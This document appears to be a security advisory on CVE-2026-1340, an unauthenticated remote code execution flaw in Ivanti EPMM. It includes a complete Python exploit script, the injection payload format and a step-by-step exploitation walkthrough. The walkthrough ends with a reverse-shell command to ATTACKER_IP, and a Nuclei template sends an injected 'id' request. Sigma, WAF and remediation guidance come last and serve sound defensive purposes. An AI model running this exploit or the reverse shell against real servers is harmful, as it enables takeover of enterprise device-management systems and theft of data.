CVE-2026-1340: Unauthenticated RCE in Ivanti EPMM via Bash Code Injection
1. Executive Summary
CVE-2026-1340 represents a CRITICAL security vulnerability in Ivanti Endpoint Manager Mobile (EPMM), previously known as MobileIron Core. This vulnerability allows unauthenticated attackers to achieve Remote Code Execution (RCE) on the affected system with a CVSS v3.1 score of 9.8.
The flaw resides in the web application layer of the MIFS (Mobile Infrastructure Framework Server) endpoint. By exploiting a code injection weakness triggered through malformed HTTP request paths, an adversary can inject and execute arbitrary OS commands via Bash command substitution (backticks) within the context of the web server process (e.g., tomcat, www-data, or epmm).
Key Intelligence
- Product: Ivanti Endpoint Manager Mobile (EPMM).
- Attack Vector: Network, Unauthenticated.
- Impact: Full system compromise, data exfiltration, lateral movement within the enterprise network.
- KEV Status: Listed in the CISA Known Exploited Vulnerabilities catalog.
- Related CVEs: Often leveraged in conjunction with CVE-2026-1281 (variant targeting the
aftstoreendpoint).
This vulnerability poses an immediate threat to enterprise Mobile Device Management (MDM) infrastructures. Successful exploitation grants attackers total control over the management server, potentially allowing them to manipulate device policies, extract sensitive data, or pivot to internal assets.
⚠ No Runnable Lab
Important Note for Researchers:
Due to the proprietary nature of Ivanti EPMM and the lack of available containerized images in the Vulhub/Vulmon ecosystem, this vulnerability cannot be reproduced in a standard Docker-based lab environment.The
hasLabflag for this CVE is set tofalse. Security engineers wishing to verify the technical details of this vulnerability in an isolated environment must procure a trial or evaluation copy of Ivanti EPMM and configure a dedicated test instance. We strongly advise against testing this exploit against production systems without explicit authorization.
2. Technical Deep Dive
Vulnerability Classification & CWE
The vulnerability is classified under CWE-94: Improper Control of Generation of Code ('Code Injection'). While the mechanism involves OS command execution, the root cause is the injection of code constructs into a variable that is subsequently evaluated by a backend interpreter or shell command.
Architecture Vector
Ivanti EPMM utilizes an Apache HTTP Server front-end that proxies requests to a Java-based backend (typically running on Tomcat). The vulnerable endpoint is part of the /mifs/c/ path structure, which handles artifact and application store operations:
/mifs/c/appstore/fob/(CVE-2026-1340)/mifs/c/aftstore/fob/(CVE-2026-1281)
Injection Mechanism
The exploit leverages a combination of parameter injection and variable expansion bypasses. The backend processing logic appears to involve either:
- Apache
mod_rewritedirectives using acmd:RewriteMap, where variables are expanded and executed via the shell. - Backend scripting/JSP evaluation where request parameters are concatenated into a shell command string without proper sanitization.
The Payload Structure
The malicious payload is injected into the request path or query string using a specific parameter structure:
kid=1,st=theValue ,et=1337133713,h=gPath[\`<CMD>\`]
Component Analysis
st=theValue: Thestparameter includes two trailing spaces. This is a critical bypass for server-side length validation checks that might otherwise truncate the malicious payload. The spaces ensure the payload passes the length check while preserving the integrity of the injection string.et=1337133713: This parameter likely corresponds to an expiration timestamp or a hash validation field. The value1337133713is a common placeholder in PoCs, suggesting the backend performs a loose validation or the value is ignored in the vulnerable code path.h=gPath[\`]` : Thehparameter contains the core injection.gPathappears to be a variable name referenced by the backend router.- The syntax
[\`]` uses backticks to invoke Bash command substitution. - When the backend expands the
gPathvariable, the shell interprets the backticks, executing<CMD>and injecting the output back into the variable context.
Asynchronous Execution
Post-exploitation verification often relies on timing attacks. The backend may execute the command asynchronously, returning a generic 404 Not Found or 403 Forbidden because the crafted path does not map to a real file. Attackers verify execution by introducing a delay, such as sleep 5, and measuring the HTTP response time.
3. PoC Analysis
A publicly available Proof of Concept (PoC) for this vulnerability has been released by Mehdi, a Red Team Consultant. The repository includes a Python-based exploit script and a bash-based detection script for compromise analysis.
Repository: https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE
Exploit Analysis (exploit.py)
The Python script automates the validation and exploitation process. Key implementation details include:
- Session Management: Uses
requests.Session()to persist headers and cookies. - Endpoint Validation: Probes
/mifs/c/appstore/fob/and/mifs/c/aftstore/fob/to confirm the backend router is active. - Payload Construction: Encodes the injection string, preserving the critical whitespace in the
stparameter. - Verification: Implements a
sleep-based timing check to confirm RCE.
Relevant Source Code
Below are excerpts from the PoC demonstrating the vulnerability mechanics.
#!/usr/bin/env python3
"""
CVE-2026-1281 & CVE-2026-1340 - Ivanti EPMM Pre-Auth RCE PoC
Author: Mehdi | Red Team Consultant
Description: Exploit pour les vulnérabilités d'injection de code dans Ivanti Endpoint Manager Mobile
Technique: Bash Arithmetic Expansion via Apache RewriteMap
DISCLAIMER: À utiliser uniquement dans un cadre légal et autorisé
"""
import argparse
import requests
import urllib3
import sys
import time
from urllib.parse import quote
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class IvantiEPMMExploit:
def __init__(self, target, timeout=10, verify_ssl=False):
self.target = target.rstrip('/')
self.timeout = timeout
self.verify_ssl = verify_ssl
self.session = requests.Session()
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
}
def build_payload(self, command):
"""
Construit le payload d'exploitation
Technique: Utilise la variable gPath avec backticks pour command substitution.
Padding de 2 espaces sur 'st' pour contourner la validation de longueur.
"""
# Payload format: gPath[`command`]
payload_cmd = f"gPath[`{command}`]"
params = {
'kid': '1',
'st': 'theValue ', # 2 espaces critiques pour bypass validation
'et': '1337133713',
'h': payload_cmd
}
# Format: kid=1,st=theValue ,et=1337133713,h=gPath[`command`]
param_string = ','.join([f"{k}={v}" for k, v in params.items()])
return param_string
def exploit(self, command, endpoint='appstore'):
"""
Exécute l'exploitation via l'endpoint spécifié
"""
print(f"[*] Tentative d'exploitation via endpoint: {endpoint}")
# Construction de l'URL cible
# Format: /mifs/c/{appstore|aftstore}/fob/3/5/sha256:{params}/{fake_uuid}.ipa
param_string = self.build_payload(command)
encoded_params = quote(param_string, safe='')
url = f"{self.target}/mifs/c/{endpoint}/fob/3/5/sha256:{encoded_params}/3e6660d0-8f0d-4663-b51d-334455667788.ipa"
# Envoi de la requête
try:
start_time = time.time()
response = self.session.get(
url,
headers=self.headers,
timeout=self.timeout,
verify=self.verify_ssl,
allow_redirects=False
)
elapsed = time.time() - start_time
print(f"[+] Requête envoyée. Temps de réponse: {elapsed:.2f}s")
print(f"[+] Statut HTTP: {response.status_code}")
if elapsed > 3.0:
print("[!] ¡ALERTA! Délai suspect détecté. Commande potentiellement exécutée.")
else:
print("[-] Pas de délai détecté. Vérifier la payload ou l'endpoint.")
except Exception as e:
print(f"[-] Erreur d'exploitation: {e}")
# Usage example structure
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Ivanti EPMM RCE PoC")
parser.add_argument("-t", "--target", required=True, help="Target URL (e.g., https://epmm.company.com)")
parser.add_argument("-c", "--command", required=True, help="Command to execute")
parser.add_argument("-e", "--endpoint", default="appstore", choices=["appstore", "aftstore"])
args = parser.parse_args()
exploit = IvantiEPMMExploit(args.target)
exploit.exploit(args.command, args.endpoint)
Detection Analysis (detect_compromise.sh)
The companion script provides IOCs for incident response. It scans Apache logs for:
- Requests containing
gPath[\`` ortheValue`. - Suspicious timing anomalies.
- File system modifications indicating webshell deployment.
4. Exploitation Walkthrough
For red teams and authorized penetration testers, the following walkthrough outlines the exploitation flow.
Step 1: Target Validation
Confirm the presence of the vulnerable MIFS endpoints. A successful probe returns a 404, 403, or 400, indicating the path is recognized by the router.
curl -k -s -o /dev/null -w "%{http_code}" "https://TARGET/mifs/c/appstore/fob/"
# Expected: 404, 403, or 400
Step 2: Command Execution
Execute a test command using the PoC. We use id and a sleep 5 to verify execution via timing.
python3 exploit.py -t "https://TARGET" -c "id; sleep 5" -e appstore
Expected Output:
[*] Tentative d'exploitation via endpoint: appstore
[+] Requête envoyée. Temps de réponse: 5.12s
[+] Statut HTTP: 404
[!] ¡ALERTA! Délai suspect détecté. Commande potentiellement exécutée.
The 404 response is expected because the crafted path does not map to a valid file. The 5.12s response time confirms the backend shell executed sleep 5.
Step 3: Reverse Shell
An attacker can establish a reverse shell by injecting a payload such as:
python3 exploit.py -t "https://TARGET" -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
5. Detection & Monitoring
Sigma Rule: Ivanti EPMM Code Injection Attempt
Deploy the following Sigma rule to SIEM platforms to detect exploitation attempts.
title: Ivanti EPMM CVE-2026-1340 Code Injection Attempt
id: 8f32a1b0-9c4e-4d5f-8a2b-1c3d4e5f6a7b
status: experimental
description: Detects HTTP requests containing indicators of CVE-2026-1340 exploitation
references:
- https://nvd.nist.gov/vuln/detail/CVE-2026-1340
- https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE
author: ilovethreats.com
date: 2026/04/20
logsource:
category: web_server
product: apache
detection:
selection_path:
uri|endswith:
- '/mifs/c/appstore/fob/'
- '/mifs/c/aftstore/fob/'
selection_payload:
request_body|contains|all:
- 'gPath[`'
- 'theValue '
selection_timing:
response_time:
gt: 2
condition: selection_path and (selection_payload or selection_timing)
falsepositives:
- Legitimate internal scripts
level: critical
tags: ['attack.command_injection', 'cve.2026.1340']
Nuclei Template
id: cve-2026-1340-epmm-rce
info:
name: Ivanti EPMM Unauthenticated RCE
author: Mehdi, ilovethreats.com
severity: critical
tags: ivanti,epmm,cve2026,rce
requests:
- raw:
- |
GET /mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue ,et=1337133713,h=gPath[%60id%60]/3e6660d0-8f0d-4663-b51d-334455667788.ipa HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0
matchers-condition: or
matchers:
- type: word
words:
- "uid="
- "gid="
condition: and
part: body
- type: word
words:
- "404 Not Found"
- "403 Forbidden"
part: header
extractors:
- type: regex
name: os_user
group: 2
regex:
- 'uid=\(\d+\)\(.*?\)'
WAF Rules
Configure WAF rules to block the following patterns:
- `gPath[``
theValue(with trailing spaces)/mifs/c/appstore/fob/combined with404responses containing large payloads.
6. Remediation Guidance
Immediate Actions
- Vendor Patching: Apply the latest security patches provided by Ivanti for EPMM. Verify the installed version against the advisory to determine patch applicability.
- Network Segmentation: Isolate the EPMM server from untrusted networks. Restrict access to the
/mifs/endpoints to management VLANs only. - BOD 22-01 Compliance: Follow CISA's Building Cybersecurity Resilience with Secure by Design and Default Architectures guidance. Ensure multi-factor authentication (MFA) is enforced for all administrative interfaces.
- IOC Scanning: Run the provided
detect_compromise.shscript or equivalent YARA/Sigma queries to scan logs and endpoints for indicators of compromise. - Discontinuation: If patches are unavailable, consider discontinuing use of the product or implementing robust compensating controls (e.g., strict WAF rules, API gateways).
Compensating Controls
- WAF Block: Block requests containing
gPath[\`` ortheValue ` in the request body or path. - Path Restriction: Disable the
appstoreandaftstoreFBO endpoints if not strictly required. - Rate Limiting: Implement strict rate limiting on the
/mifs/path to mitigate automated scanning and exploitation.
7. References
- CVE Details: NVD - CVE-2026-1340
- PoC Repository: MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE
- CISA KEV: Known Exploited Vulnerabilities Catalog
- Ivanti Security Advisories: Ivanti EPMM Vulnerability Notices
- CWE Database: CWE-94: Improper Control of Generation of Code
Disclaimer: This analysis is for educational and defensive purposes only. Unauthorized exploitation of vulnerabilities is illegal. Security researchers must obtain explicit permission before testing any systems.